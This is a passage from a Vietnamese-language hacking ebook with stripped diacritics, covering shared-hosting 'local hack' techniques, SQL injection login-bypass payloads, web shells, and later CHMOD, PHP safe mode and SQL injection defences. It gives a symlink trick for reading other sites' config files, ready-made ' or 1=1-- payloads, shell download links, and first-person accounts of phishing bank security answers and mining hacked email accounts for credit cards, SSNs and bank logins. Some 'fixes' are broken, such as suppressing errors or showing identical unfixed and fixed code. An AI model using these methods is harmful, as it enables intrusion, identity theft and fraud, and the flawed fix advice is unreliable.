ln -s /home/hieupc/domains/hieupc.com/public_html/config.php 12345.txt
File ta a symlink v la config.php, link vi 12345.txt trn host cua minh.
Gi ta xem cai nao:
http://hieupc.com/12345.txt
Kt qua hin ra la file config.php bn site ma minh ang attack:

Thng qua cch ny ta c th lam c kha nhiu chuyn nh ly c pass cua Mysql t file
config cua site va t y ta co th khai thac tip chim quyn admin cua site o. Cch ny
c goi la local hack thng.qua Mysql.
- Nu website bi li LFI hoc RFI thi ta co th dung li nay a shell vao va khai thac nh
binh thng. Tim hiu thm v dang hack nay vnbrain.net hoc hcegroup.net
- Cac ban cung co th get root qua nhng kernel linux bi li ma server cha upgrade. Ci ny ln
milw0rm.com cp nht thm.
- Nu ban co mt mc tiu mun hack trang web nao o ma minh lai khng co host trn cung
Server o thi ta phai Reverse IP xem nhng site cung Server o va t o ta se hack theo dang
leo thang, c gng search li cua nhng site cung server o t o ta hack bng nhiu cach nh
SQL Injection, File Inclusion Attack,RFI, XSS t o vao c admin panel cua site ri thi
ta c gng lam sao Upload c shell ln. Sau khi a co shell trn cung server vi site ma ta
mun hack thi ta bt u vn dng kha nng local hack cua minh va attack +deface nu mun.
Ta cung co th ap dng trng hp nay hack shop bng localhack. Nhng nhng shop ln thi
a s xai Server ring nn vic mun hack c vao cung la mt vn .
- Nu gp pass cua Admin la MD5 ma ban lam bing crack thi ta co th convert password
123456 sang dang MD5 va sau o chep e vao pass MD5 kia (tc nhin la luc nay ban a vao
c Mysql cua site o thi mi co th lam c vic nay). Ta cung co th change email address
va sau o dung tinh nay forgot password (cai nay hieupc thng dung cho VBB hay IBF reset
password cua admin). Sau o ng nhp th xem sao.

Page 43
Bit thm v CHMOD:
Mt trong cac li ma cac admin hay mc phai la CHMOD sai, do CHMOD sai nn kha nng site
o bi tn cng la cao hn rt nhiu so vi cac site khac CHMOD ung, c bit la cung server
khi bi hack local. Tt nhin l chi vi li nay thi khng th tn cng trc tip vi y khng phai
l li co th tn cng c. Li nay d dang bi khai thac khi th mc t quyn ghi va chay ng
thi cho mt th mc, thng la cac th mc cho phep upload. Nn hacker d dang chay shell
th mc nay. Mt trng hp khac la khi hack local, CHMOD 777 la 1 tham hoa, vi nh vy la
bi kim soat toan b th mc o. Va ti dam chc dng tay hacker nao khi hack local ma nhin
thy cai mau xanh let (mau thng thng cho cac th mc la ) cua th mc 777 thi mng ra mt
v ngh admin nay "ga" gh.
V sao ti vit bai nay ? Vi nhiu admin, coder khng bit CHMOD la gi ? hoc chi hiu s qua.
Ho chi quan tm n cho website chay c, chm ht. Nhiu ngi con hiu rt ngy th rng
quyn ghi ng ngha vi 777. Hoan toan sai!!! Vy CHMOD la gi ?
CHMOD - o la pham tru lin quan n cac files va th mc, co chc nng chi ra cho server bit,
ai c th lam gi i vi file hay th mc nao o. Chu yu CHMOD a ra cac lnh nh quyn
c oc, vit vao file (hay th mc), quyn thc hin mt cng vic nht inh.
V phn ln cac server lam vic trn c s h thng UNIX, nn chung ta se nghin cu v cach
CHMOD chnh cho cc servers ny.
Trn cc h thng UNIX, ngi s dng c chia ra lam 3 nhom: "user" (chu nhn trc tip cua
cc files), "group" (thnh vin cua nhom ma ngi chu nhn file co tham gia) va "world" (tt ca
nhng trng hp khac). Khi ban kt ni vi server, no se xac inh xem ban thuc v nhom nao.
V d ban kt ni vi server bng FTP, khai bo tn truy cp nh mt thanh vin, chinh server se
quy ban vao nhom "user". Con nhng thanh vin khac truy cp bng FTP thuc v nhom
"group". Khi ai o n site cua ban bng trinh duyt web, se c quy vao nhom "world".
Sau khi xac inh nhom, ngi s dng se c gan quyn han nht inh i vi file hoc th
mc nao o. C th la ngi s dng se c oc, ghi hay tao mi (hoc xoa) file. xem th
mc nao o thi no phai ung h cho vic xem nay. c xem ni dung th mc, thi cac files
hay th mc con trong o cung phai co ch "Cho phep oc". Con tao file hay th mc mi
nm trong th mc nay lai oi hoi phai co quyn ghi. Tom lai, thc hin mt trong nhng vic
trn, cn phai t vao th mc ch "quyn oc" va "quyn thc hin".
By gi chung ta se thc hanh...
Nh trn nu, c tt ca 3 nhom ngi s dng va 3 "quyn han" i vi files hay th mc.
xac inh quyn han cho cac nhom nht inh, thng nht s dng cac ky hiu bng con s nh
sau:
4 =read (quyn c oc)
2 =write (quyn c ghi)
1 =execute (quyn c thc hin)
Bng phep cng n gian cac con s nay co th hin thi c ca mt "t hp" quyn han khac
nhau. V d, 3 (2+1) - quyn ghi va quyn thc hin i vi file (hay th mc); 5 (4+1) - quyn
oc va quyn thc hin; 6 (4+2) - quyn oc va quyn ghi; 7 (4+2+1) - quyn oc, ghi va thc
hin. Tom lai co tt ca 7 phng an sau:
7 =read, write & execute
6 =read & write
5 =read & execute
4 =read
3 =write & execute
2 =write
1 =execute
Page 44
K hiu lnh CHMOD thng co 3 con s: con s u th hin quyn han gan cho ngi s
dng thuc nhom "user" (Tc la i vi ban). Con s th hai chi ra quyn han cua ngi s dng
thuc nhom "group" va con s th ba - dnh cho nhm "world".
Trong phn ln cac chng trinh FTP hin ai u ung h CHMOD theo kiu nu trn (Vi d,
cng c truy cp bng FTP manh nht hin nay la WS_FTP)
Th nhng cung khng tha nu nh ta bit thm v cac lnh cua h thng UNIX. lnh "chmod"
trong UNIX c 2 ch : tuyt i (Bng cac con s) va bng cac ky hiu ch.
Khi s dng ch tuyt i (bng cac con s), thng nht dung t hp 3 con s c nu trn
th hin quyn han.
Trong trng hp s dng ky hiu ch, chung ta se bt gp nhng ky hiu sau:
"r" - quyn c oc
"w" - quyn c ghi
"x" - quyn c thc hin
Ngoi ra cn c:
"u" - i vi user
"g" - i vi group
"o" - i vi other (world)
"a" - i vi all (tt ca)
V d: 755 = chmod u=rwx,go=rx filename; 644 = chmod u=rw,go=r filename; 600 = chmod
u=rw,go=filename; 444 =chmod a=r filename.
Di y la bang cc t hp thng gp phn ln cac hosting:

Quyn truy cp Lnh (Ma) Miu ta:
U G W
r w x r - x r - x chmod 755 Danh cho cac th mc, CGI-scripts v nhng files thc hin khac
r w - r - - r - - chmod 644 Danh cho cac files thng
r w - - - - - - - chmod 600 Giu files i vi tt ca ngoai tr ban va nhng scripts cua ban
U =user; G =group; W =world r =Read; w =Write; x =Execute; - =Khng c quyn
Hiu thm v By-pass login:
i khi ban truy cp vao 1 s trang nao o, ban se y co phn ng nhp ... va ban mun ng
nhp vi quyn quan tri thi sao ? Chi cn bit user va pass la co th ng nhp thi ch gi ?
Nhng trong trng hp khng bit thi sao. Vy by-pass login se giup cho ban ng nhp vao
ni o vi quyn cao nht .. c ban la vy o nha. Cn y la mt s data giup ban submit
xem coi n bi by pass login khng :
Username
Password

' or 1=1--
' or 1=1--

" or 1=1--
" or 1=1--

or 1=1--
or 1=1--

' or 'a'='a
' or 'a'='a
Page 45
" or "a"="a
" or "a"="a

') or ('a'='a
') or ('a'='a
Di y la bai vit cua boyxintin Hcegroup.net:
Tm hiu thm v cng ngh mt chut.
Cc ng dng hin nay, ca web application hay win application u s dng m hinh 3 lp gm :
lp giao din, lp x ly, lp c s d liu.
- lp giao din chinh la nhng gi ma ngi dung nhin thy, nh mt trang web hay chng trinh
yahoo cc ban co th nhin thy.
- lp x ly bao gm nhng oan code x ly nhng s kin, vi d nh khi ban nhp user + pass
cho yahoo msg, xong nhn enter, chuyn gi xay ra ? lp x ly nay se thc hin cac s kin o.
- lp c s d liu dung lu tr thng tin, nh cac thng tin v tai khoan khach hang, thng
tin quan tri,...tu theo mc ich cua ng dng lam gi. c s d liu c lu tr trn cac h
quan tri c s d liu (Mysql, Sql server, Oradcle, MS Access...)
V d :
hxxp://daleosterloh.com/bug/index.php

Lc ny lp x ly se thc hin cac cu truy vn n c s d liu xem thng tin ban nhp vao
co ung hay khng, va se thc hin cac m kich ban cua no.

Tai sao co th bypass c ?
co th bypass c mt cach hoan hao, trc ht xin khng inh cac ban phai hiu trong lp
x ly c vit nhng gi ? nhng ai a oc qua ebook cua hieupc cung co th bit c vai t
khoa bypass, tt ca nhng t khoa o do cac attacker a tn cng vao h thng, xem source va
a ra, v cc site thng dung chung 1 source (mua t u o) nn cht la cht chum.

By gi minh se phn tich oan code trn cac ban hiu r tai sao co th bypass c nhe.

Page 46
Sau khi cc lp giao din gi d liu v thi phn x ly nay ta co 2 bin $username +
$password
l 2 bin cha user va pass ma ngi dung nhp vao
Bo qua nhng th rm r, cc ban tp trung vo cu query:
select * from users where username='".$username."' and password='".$password."'
v cu if :
if($list_rows >0)
{
header("Location: manage.php?hcegroup=1");
}
else
{
header("Location: error.php");
}
C ngha nh sau :

Query chon ra tt ca thuc tinh (username, password...) t table users vi iu kin
username=user nhp, password = password a nhp.

if : nu nh s lng dong tra v > 0 thi cho vao, khng thi t chi

n y minh cha thy li, bai toan kha login : tim trong c s d liu co tn tai user + pass o,
nu s lng ln hn 0, co ngha la tn tai, thi cho vao, khng th deny.
y giai thich thm tai sao dung ($list_rows > 0), thng trong database thi user chi co mt,
nn nu tim thy gia tri thi no la 1, mt s lp trinh vin thay vi vit =1 thi vit thanh >0.

Vy by gi ban nhp user = abcd va password = ' or '1'='1 thay phn mau o trn nhe. cu
query se nh th nay :
select * users where user ='abcd' and password ='' or '1'='1'
cu trn c hiu qua n gian, khng cn quan tm user la gi, pass la gi, vi '1'='1' la 1 iu
kin hin nhin ung, nn tt ca user co trong bang se c select ra, vi th s lng users tim
c lun ln hn 0 (tr khi trong database chng co user nao). Lc ny ban qua c cu lnh
if va vao c trang admin, nu cac ban hiu c nhng gi minh vit trn thi y cac ban co
th suy lun ra la u cn phai nht thit la '1'='1', co th la '1'<>'0' hoc 1>0 hoc 'a' ='a hoc
'a'<>'b, min sao la 1 iu kin ung c chen vao cu query la c , nh vy co hang t cach
bypass.
Giai thich thm cho cac ban v du ' , du -- khi bypass, hi trc luc mi oc minh cung thc
mc. V d by pass cng login trn bng pass : ' or '1'='1
tai sao co du ' u, tai sao cui s 1 khng co du '
hy nhn cu select : (ng quan tm n du " nhe)
select * from users where user ='' and password=''

Page 47
khi user & pass cua ban a vao no c t gia 2 du '', cho nn theo ung cu phap cac ban
phai t nh th nay:
select * from users where user ='abcd' and password='' or '1'='1'
chng qua la no ong du '' th SQL n khng nhn cc gi tri minh a vao la chui thi.

Ngoi ra du -- dung chu thich cho 1 dng, khi ban thm du -- vo th nhng ky t sau n se
khng cn ngha vi SQL
v d pass trn minh co th dung password : ' or '1'='1'-- .Thi cu lnh th nay:
select * from users where user ='abcd' and password='' or '1'='1'--'
Lc ny du ' nm sau -- se khng cn tc dng, do o cu lnh khng bi li.

Page 48
III. How To Get These Important Information
1. Kim link Admin nh th nao:
Co mt cu chuyn khi hai la Hieupc tng nhiu ln kim link admin thng qua chat hoc gi
email hoi admin la link admin cua site la gi?. Cai nay cac ban co tin ni khng?. S tht la cach
nay thanh cng y va quan trong la ban phai bit cach n noi va a ra bng chng r rang logic
mt chut la ok. y la mt ln chat qua Yahoo hoi xin link admin cua 1 trang web m hieupc
mo mm hoai khng ra link admin upload shell ln, Hieupc a co c user v pass admin
thng qua li SQL Injection. Xem hinh di y ban se hiu nhe:

Page 49
Cui cung thi link admin cua site ma Hieupc ang attack l: http://www.site.com/ecp c nhiu
o ma nay gi au u.
Kim c cai link admin ri gi upload shell ln thi, phai mc cng i scan link ri lai mo
mm chi cho mt. Cach nay lam tuy co phn mao him nhng quan trong la kha nng sang tao
logic va binh tnh cua ban.
Lu y: C gng kim c email hoc nick chat cua Webmaster hoc ngi ma Design ra Web
ny. Nh xem mi quan h site o co lin quan gi n ngi minh se lin h hoi link admin
nh.
Cung co ln Hieupc email hoi link admin va cung a thanh cng, gi kim lai email o
show cho moi ngi xem nhng kim nay gi khng ra.

Page 50
2. Ly nhng thng tin quan trong ma ta cn:
Ta thng ly nhng thng tin quan trong nh: CC, hosting, bank account, accounts web,
itunes, ebay, paypal..my cai nay trong email list c kha nhiu, mun kim c email list +
password d nhin la ban phai hack, hack nhng dang li nh: SQL Injection. Sau y la nhng
minh chng:
Co ln hieupc hack c mt bank account US nhng lai bi hoi security questions, mc du co
c user va pass cua email, a v email search ca bui khng ra c my cai answer cua no la
g. Vi vy Hieupc a ngh ra cach la fake 1 cai email vi ni dung nh sau, cac ban xem hnh l
se hiu (ti gi password email cua no vn cha i, login vao email cua hn ta ri chp mt
ci hnh no):
Vy la cung a co c cai minh cn ri. Login vo bank account thi. Cai nay lai mang tinh
logic va mt chut may mn na.
Hieupc con mt s cach khac na nhng chi dng tai y, Hieupc a tng bin mt shop CC
NON thanh mt shop co FULL INFO bao gm SSN, DOB, PIN va co ca credit card a c
scan qua email cung thng qua nhng thu thut mang tinh logic va sang tao nay. Chi gi y nh
vy cac ban t tim hiu, vi cai nay no cung mang tinh cht phishing hay scam nhiu qua.
- Ly thng tin t Email List ma ban co nh th nao la tt nht. Thng thi Email list cua ban co
sn password cua nhng email vi vy ban login nhng email dang sau: gmail.com, yahoo.com
v hotmail.com bao gm ca live.com hay msn.com. La se co th co nhng thng tin quan trong
nh: CC, hosting, bank account, accounts web..
Page 51
Ban chi cn dung tinh nng search email co sn (hu ht cac dich v email u co phn search
email), v d nh Hieupc cn tim bank account thi anh ch: bank luc nay se hin ra nhiu
email co lin quan n t khoa bank. T y ban se bit chu email s hu nhng bank g, sau o
ta c gng dung username va password cua email login nu khng thanh cng thi ta lai search
tip vi ch: user sau o search sang: password , gm toan b username va password ra notepad
sau o ta th ln lt. Tng t cach lam nh vy i vi nhng thng tin ma ta cn nh: SSN,
DOB, Paypal, Itunes (i vi PayPal khng cn bit password cua email la my ky t, ta chi
cn login c vao email ri search ch Paypal xem th chu email co xi Paypal hay khng,
nu co xai Paypal thi ta tip tuc search tip password ri kim cai nao co password la trn 8 k
t, sau cung mang vao login th xem sao)
Vi d minh hoa v 1 bank BOA ma hieupc hack c co balance lun nh (v bank account
hack mi co balance con bank reg bng fake full info thi lam gi co balance, ung khng ne?)

Lu y: Nhng file attachement di dang file: .doc,.xls,.pdf cua chu email nhiu luc lai cha
nhng thng tin quan trong cua ho. a rt nhiu ln hieupc ly c nhiu thng tin nh: Credit
Card, Bank account, Passport, PayPal trong mt file attach ma chu email save lai trong
emailVi d v mt File
document cha thng tin
Bank v CC:

Page 52
Hieupc thng check nhng email di dang @yahoo.com hack bank account va a s thanh
cng rt nhiu. Trong Yahoo ban co th search File Documents rt nhanh bng cach sau, ban
chuyn sang ch view: Mail Classic va sau o chon My attachements la no se hin ra ngay.

Page 53
IV. Exploiting By Tool, Scripts:
1. Shell Script:
- Hin nay co rt nhiu shell script, nhng hieupc thy chi co r57.php, c99.php v kshell.aspx l
tt nht.
Download b shell scripts tai y:
http://rapidshare.com/files/132986898/SQL_InjecTion___XSS_TooLz.rar
http://www.guru.net.vn/kshell_1.2.zip
2. Sau y la nhng Tools Hack ma hieupc hay dng nht:
- Tool dnh cho scan: Acunetix Web Vulnerability Scanner 6, Advanced IP Scanner 1.5,
Network Monitor.
- Sniffer Tools: EffeTech HTTP Sniffer, Packet Sniffer, Password Sniffer, MSN Sniffer
- Tools h tr cho SQL Injection: AKD-injection 3, Absinthe 1.4.1, URLScan v3.1, Scrawlr,
Microsoft Source Code Analyzer, BAKOs SQL_Injection_Scanner_v2.2, SQL INJ ECTOR
V2.0.
- Database Tools: MySQL, MSSQL Server, RazorSQL
- Tools h tr thm: ActivePerl, ActivePython, PHP, CGI, ASP, Metasploit 3, XN Hashing Tool,
Putty, CuteFTP, RemoteDesktop
- Link hay v LFI va RFI:
http://www.guru.net.vn/PermaLink,guid,1924e061-6881-453d-a841-5ec94c00591f.aspx
Nhng tools trn ban co th search va download google.com.

Page 54

V. Speacial Things:
1. Hng dn cch Fix SQL Injection va nhng cach khc phuc khc:
PHP thng thng se c 2 dang v li ny, dang th nht c th nhn thy c - goi l thng
l SQL injection, dang th hai khng nhn thy c mc d n bi li thit - goi l Blind SQL
injection.

Thng thng th kim tra li SQL injection dang th nht, ta thng thm du ' (du nhy)
vao phia sau cac ia chi c dang: user.php?id=1 hoc user.php?id= ( lu : c nhiu t kha
khac kim tra li SQL ch khng hn l ?id=' VD: ?nid=..v.v)

VD: http://hieupc.net/user.php?id=1' va http://hieupc.net/user.php?id=' u c.

Cn dang th hai th kh hn, Va cac ban c th d dang ngn chn cc thng bo li gi t
my chu bng cch thm k t @ trc cu lnh SQL.
v d:
view plainprint?
$id =$_GET[id];
mysql_query("SELECT * FROM xviet.net WHERE id=$id");
$id =$_GET[id]; @mysql_query("SELECT * FROM xviet.net WHERE id=$id");
Nu t pha hacker th se kh c th tm ra c, v th nu ban khng r v SQL injection ban
c th thm @ vao trc cu lnh nh trong vi d trn dung che du li.

Hoc s dng:
error_reporting(0);
u oan PHP che du li.
Cn nu site cn kim tra do ban lm webmaster th c th lam nh sau:
view plainprint?
$id =$_GET[id];
mysql_query("SELECT * FROM xviet.net WHERE id=$id");
Vi cch pht hin: http://hieupc.com/user.php?id=' th bin $id se c khai bo l ' (du nhy)
nu bi dnh li, va trong oan code dng print in gi tri cua bin $id ra, nu nhn thy du
nhy th l dnh li, nu khng th hy kim tra lai 1 ln na v trong oan code trn hon ton
cha c fix li, he he khng lm l tt in nh ngi thnh nh tranh ngay.
Cung cn c theo v d trn, ban c th dng hm intval() khc phc li ny, v d:

Page 55
Cha fix (unfix):
view plainprint?
1.$id =$_GET[id];
2.mysql_query("SELECT * FROM xviet.net WHERE id=$id");

fix (fixed):
view plainprint?
1.$id =$_GET[id];
2.mysql_query("SELECT * FROM xviet.net WHERE id=$id");
Trong intval, int c ngha la integrals (S nguyn) cn val c ngha la value (Gia tri) v vy gi
tri cua bin $id phai l s nguyn, lm vy hacker se khng th inject hoc exploit oan SQL cua
ban.
Bi vit da trn nn Anti PHP-SQL Injection vncoder.net
SQL Injection:
- Hu ht cac li SQL Injection u la do cu lnh SQL sai hoc do User lam cho cu lnh SQL
sai , khng thc hin ung chc nng cua no . Vi d nh chung ta co mt Script kim tra ng
nhp nh sau :

M lnh (php)
<?
//Cc lnh Connect vo SQL Database .v.v.
$username =$_POST['username']; //Ly User va Pass t Form
$password =$_POST['password'];
$result =mysql_query("SELECT * FROM users WHERE user =\"$username\" AND password =\"$password\"");
if (mysql_num_rows($result) >0) {
//ng nhp thanh cng
}
else {
//ng nhp khng ung Username hay Password
}
//.......
?>
- oan Script trn la mt oan Script rt n gian thc hin Login thng qua cu SQL kim tra
username v password . Cu lnh SQL nguyn thuy la :
Trch:
SELECT * FROM users WHERE user ="$username" AND password ="$password"
- Tuy nhin, y lai la mt SQL Injection v cung ln, nu nh User nhp bin User la " OR 1
OR user="

- Khi o lnh SQL se tr thanh :
SELECT * FROM users WHERE user ="" OR 1 OR user="" AND password ="$password" Page 56
- Kt qua tra v se la toan b user trong Database va d nhin y la mt trng hp Login khng
hp l (bin password cung co th s dng tao SQL Injection) . Thc ra, li trn la do bin
$username, c th fix bng cach kim tra bin user, ri sau o mi kim tra bin pass, hoc mt
cach nhanh hn, fix c hu ht tt ca cac li SQL Injection ma chi cn s dng mt ham co
sn cua PHP, l hm addslashes .

- Xin ni mt chut v ham addslashes: ham nay se tra v mt chui vi du \ trc cac ky t cn
trch dn trong Database, cac ky t o la " \ v NUL (\0) .

- Cu truc ham addslashes : string addslashes ( string str)

- Nh co ham addslashes m cu lnh SQL cua ta se tr thanh :
SELECT * FROM users WHERE user ="\" OR 1 OR user=\"" AND password ="$password"
- Nh vy thi cu lnh SQL se hoat ng ung nh chc nng cua no . Mt s li SQL Injection
khc cung co th khc phc bng phng phap nay. Ti cung xin nhc lai la phng phap nay
chi fix c hu ht tt ca cac li SQL Injection, tc la cac li do bin PHP gy ra, con cac li do
ban thn cu lnh SQL thi cach nay khng co hiu qua gi. Tuy nhin nu dung phng phap nay
v cu lnh SQL chc chn thi ti tin rng ban se khng cn lo lng v SQL Injection.

PHP Injection:

- Li PHP Injection thng xay ra vi cac script oc File, tng tac h thng v.v. . y la mt
in hinh cua PHP Injection:

M lnh (php)
<?
//...
readfile($file);
//...
?>
Mi nhin thi khng co li gi, nhng nu nh vi mt ly do gi o ma bin $file khng c khai
bo th y la mt li PHP Injection rt nng.
- Lc ny th bin $file lai c khai bao bi chinh PHP, chc nng Regiser-Global v kt qua l
se a ra ni dung cua file somescript.php hay bt c File nao trn h thng (k ca File cha
Password nu hacker chiu kho mo va xem nh host cua chung ta tiu lun).

- Nu phn tich thi ta se thy rng bin $file a c khai bao do chc nng Register-Global
(chc nng t ng ng ky cac bin trong GET, POST , COOKIE v.v...), va c fix mt cach
n gian la tt chc nng nay i. Vic tt chc nng nay i cung khng anh hng gi nhiu n
PHP.
Cac bai tham khao thm:
Ch Safe Mode = On, ban cht va cach khc phuc:

Page 57
Safe Mode l g?
Safe Mode trong PHP (ch An ton trong PHP): mt ky thut thng c Shared Hosting
(Hosting Chia se) p dng tng cng bao mt (chng lai cc tn cng ni b, thng c
goi l Hack Local). Ky thut ny khng thc s hon hao mc PHP va cho n thi im hin
tai n vn c p dng nhiu ni. Tuy nhin, cung tht may l k t phin ban PHP 6.0 tnh
nng nay se bi loai bo v chng ta se khng cn phai bn tm n n na.

Xac inh Safe Mode ang la On hay Off?
Tao mt file info.php trong th mc Web cua ban vi ni dung nh sau:

<?php
phpinfo();
?>

M ng dn ti file info.php. VD:
http://localhost/info.php
http://yourdomain/info.php
Tm mc "Loaded Configuration File" bit file cu hnh php.ini c t u.
Tm mc "safe_mode" bit trang thi hin tai cua Safe Mode (On l bt, Off l tt)

Tt ch Safe Mode?
Trng hp 1: Ban c th quan l Server

Xac inh vi tr file cu hnh php.ini, m file v thit lp gi tri:
safe_mode =Off

Trng hp 2: Ban khng phai la ngi quan l Server
Ban c th th tt n bng 1 trong 3 cch (vi iu kin Server cho phep ghi e ln thit lp ban
u).
- Cch 1 - Tao mt file "php.ini" th mc Web cua ban vi chi thi:
safe_mode =Off

- Cch 2 - Tao mt file ".htaccess" th mc Web cua ban vi chi thi:
php_flag safe_mode off

- Cch 3 - Dng hm ini_set cua PHP: t lnh sau vo file cu hnh (chng han globals.php,
configuration.php)
ini_set('safe_mode','Off');

Page 58
Ban cht cua Safe Mode:
Gia s ban c mt script: /home/hieupc/do_some_thing.php vi ni dung:
<?php
// do job-1
// do job-2
// ....
// do job-n
?>

Vi Safe Mode = On, khi ban thc thi script do_some_thing.php trn, Server se kim tra
Owner (chu s hu) cua script do_some_thing.php l ai?
VD: "hieupc" hay "apache" hay "user-xyz" nao o.
Nu trong cng vic "job-x" c 1 php x l lin quan ti file hay th mc nao o (th mc
/opt/lampp/tmp chng han), ma file hay th mc ny lai thuc quyn s hu cua 1 Owner khc),
li se xay ra.

Ngoi ra khi Safe Mode = On th c th rt nhiu ham bi v hiu ha.
VD: move_uploaded_file(), mkdir()... Do vy, nu trong script *.php cua ban c s dng 1
trong cc hm trn, li cung xay ra.

Danh sch cc hm bi v hiu ha: http://vn2.php.net/manual/en/features.safe-
mode.functions.php
Ngn chn kiu tn cng SQL Injection:
Ban mun giam thiu c hi cho nhng ke tn cng khi ho a m SQL nguy him vo cc gi
tri thng s lnh.

Nhiu ng dng xy dng cc cu lnh SQL ng bng cch phn tch cc mu ri thnh mt
chui ln. Cch tip cn ny pht sinh vn khi lm vic vi d liu nhi phn, v cung dng
ln kha nng mt ke tn cng c th thc thi m SQL nguy him bng cch tim n vo mt
gi tri thng s. M nguy him ny c th c s dng can thip vao thng tin trong c s
d liu hoc ngay ca chay mt ng dng khc trn server. Ban c th xem mt s v d ang s
trn cac server c s d liu tai http://www.owasp.org/asac/input_validation/sql.shtml.

ngn chn vn ny, ban nn xc nhn tnh hp l cua u vao do ngi dng cung cp,
kim tra rng n c kiu d liu ung nh mong mun, khng dai khac thng, v.v... Cch d
nht thc hin iu ny l s dng mt truy vn c-thng-s-ha.
Cc truy vn c-thng-s-hoa c s dng cho tt ca cc li goi thu tc tn tr, nhng ban
cung co th s dng chng vi cc lnh SQL ng. Trong trng hp th hai, ban chi cn ly
mt lnh SQL bnh thng v thay th cc gi tri ng vi cc thng s (kt qua se trng ging
nh phn thn cua mt thu tc tn tr n gian). Di y la mt lnh SQL c-thng-s-ha:
INSERT INTO Shippers (CompanyName, Phone) VALUES (@CompanyName, @Phone)
Page 59
s dng lnh ny, ban cn thm cac i tng Parameter tng ng vao i tng Command
(vi cc gi tri ph hp). Trng hp ny yu cu hai thng s (@CompanyName v @Phone).
ng dng Console di y s dng truy vn c-thng-s-hoa nay thm mt ban ghi mi
vo bang Shippers cua c s d liu Northwind.

Public Module ParameterizedQuery
Private ConnectionString As String ="Data Source=localhost;" & _
"Integrated Security=SSPI;Initial Catalog=Northwind"
Public Sub Main()
' Tao kt ni v cu lnh.
Dim Con As New SqlConnection(ConnectionString)
Dim UpdateSQL As String ="INSERT INTO Shippers " & _
"(CompanyName, Phone) VALUES (@CompanyName, @Phone)"
Dim Cmd As New SqlCommand(UpdateSQL, Con)
' Thm cc thng s nhp.
Dim Param As SqlParameter =Cmd.Parameters.Add("@CompanyName", _
SqlDbType.NVarChar, 40)
Param.Value ="Test Company"
Param =Cmd.Parameters.Add("@Phone", SqlDbType.NVarChar, 24)
Param.Value ="(503) 555-9931"
Try
' Thc thi cu lnh.
Con.Open()
Dim Rows As Integer =Cmd.ExecuteNonQuery()
Console.WriteLine(Rows.ToString() & " row(s) affected.")
Catch Err As Exception
Console.WriteLine(Err.ToString())
Finally
Con.Close()
End Try
Console.ReadLine()
End Sub Page 60

End Module

Mt s cch phng chng li SQL Injection:

Cc ban cn ch rng cac tng la loc goi thng dng khng th bao v cc ban nu bi tn
cng SQL Injection. Chung khng u thng minh bit du hiu cua cuc tn cng v ban cht
cua tn cng ny l do li cua ng dng. V th chng lai tn cng loai ny cn nhng k thut
ring bit m chu yu l ti u hoa ng dng bi li. Ta ln lt tm hiu mt s phng phap:

Han ch b pht hin li:
Attacker da vo nhng li trong lp trnh ng dng tn cng v c th attacker da vo cc
du hiu pht hin ng dng bi li. Vy vic lm cho cc du hiu o bi che i, tr nn kh
hiu hn, hoc bin mt...c hu ht cc chuyn gia bao mt s dng. Lu l k thut ny chi
dung du li, cn li trn ng dng vn cn o, chi la chng lai s pht hin qu d
dng li ke xu khai thc.

Nhng nhng attacker khn kho vn c th nhn thu c kiu phng chng nh th ny. N
c th tranh c nhng tn cng n gian nh la thm du (du nhy) vo cui ng dn. V
phng phap tm kim ng dng bi li cua nhng tn cng nh th da vo nhng du hiu tra
v cua ng dng hoc trc tip t database. Ta c th chi a ra nhng thng bo chung chung
hoc inh hng tr lai trang ban u(redirect). Trong trng hp ny, cng vic tm kim li v
xac inh mc tiu tr nn cc kho i vi attacker.

Tuy nhin attacker lun tao ra nhng cng ngh tm kim li tinh vi hn, tt hn, gin tip
xac inh du hiu tra v. Tn cng kiu ny cn c goi la Blind SQL Injection nh ta tm
hiu trn.

Phng chng t bn ngoi:
Giai php ny se dung tng la c bit bao v ban khoi nhng ng dng dng vic truy cp
database vi mc ich xu. Chng ta cn lu rng attacker tng tac vi ng dng web thng
qua mt trnh duyt vi kt ni t xa. Sau o, ng dng gi yu cu n database. Nh vy
chng ta c th ngn chn cc tn cng gia attacker vi ng dng, gia ng dng vi database
v ngay ca trn chnh ban thn database o.

Page 61

Mt s phng phap phng chng c th thc hin nh:

Nhng b loc, b qut v nhng iu khin truy cp c s d liu se lm cho ng dng web kh
bi tn cng hn.

Cai thin d liu nhp vo:
Cch phng chng thc s chng lai SQL Injection l kim tra va lam ung cac cu truy vn.
Nh chung ta cp, li ny l do ng dng khng kim tra d liu nhp vo cua ngi dng.
Do o ngi dng c th thay i, chinh sa, tham s hoc thm ca mt thc th truy vn vo
cu lnh. V th mi d liu nhp cua ngi dng cn c theo di v c nhng rng buc nht
inh.

Th nht, ng dng cn phn loai cc kiu d liu nhp vo. V d, nu ng dng yu cu d
liu nhp vo l kiu s th khi ng dng nhn d liu nhp vo khng nn chp nhn cc kiu
khc ngoai tr kiu s. Mt s hm kim tra trong PHP:
is_numeric($str) : kim tra $str c phai kiu s hay khng
is_int($str) :kim tra kiu interger
is_float($str) :kim tra kiu s thc
...

Th hai, nu d liu nhp vo khng r kiu g th t nht cung phai xac inh nhng kiu khng
c php c th c goi. Trong trng hp ny chng
ta se phai loc cc du nhy, lnh, cc k t c bit. Mt vi vic loc d liu
c th thc hin trn ton b ng dng( nh khng bao gi lu d liu c du vao c s d
liu) v trn mt vi kiu d liu nhp vao( nh khng co du , trong ia chi mail). Page 62
VD:
magic_quotes_gpc GPC=GET,POST,COOKIE)

Hm se kim tra cc d liu thuc 3 loai trn v khi pht hin c cc du ' (single-quote), "
(double quote),
\ (backslash) th se t ng thm vo du \ (backslash) ngay trc n:
<?php
echo get_magic_quotes_gpc(); // 1
echo $_POST['lastname']; // O\'reilly
echo addslashes($_POST['lastname']); // O\\\'reilly

if (!get_magic_quotes_gpc()) {
$lastname =addslashes($_POST['lastname']);
} else {
$lastname =$_POST['lastname'];
}

echo $lastname; // O\'reilly
$sql ="INSERT INTO lastnames (lastname) VALUES ('$lastname')";
?>

Trong khi vit mt c s d liu hng ng dng, hay khi trin khai mt
ng dng m ngun m cn chu y n cc vn nh th v thit k xac minh ung u vo.
Bin php ny se gip bao v ban t cc tn cng SQL Injection khng tr thnh mi ngon cho
cc attacker.

Hiu bit v cch phng chng ny l rt quan trong nu ban ang trin khai mt ng dng
thng mai. Chi cn nh rng cc nh pht trin c kha nng vng li khi lp trnh v ban se
phai thc hin cac bc sa cc li o. Va cn lam iu ny ngay ca khi cha co nhng l
hng c cng khai cho ng dng o.

Kt lun:
ng dng tht s tranh c tn cng SQL Injection cn trin khai mt s vic sau:
i. Khng tra v nhng trang li c thng tin nhay cam.
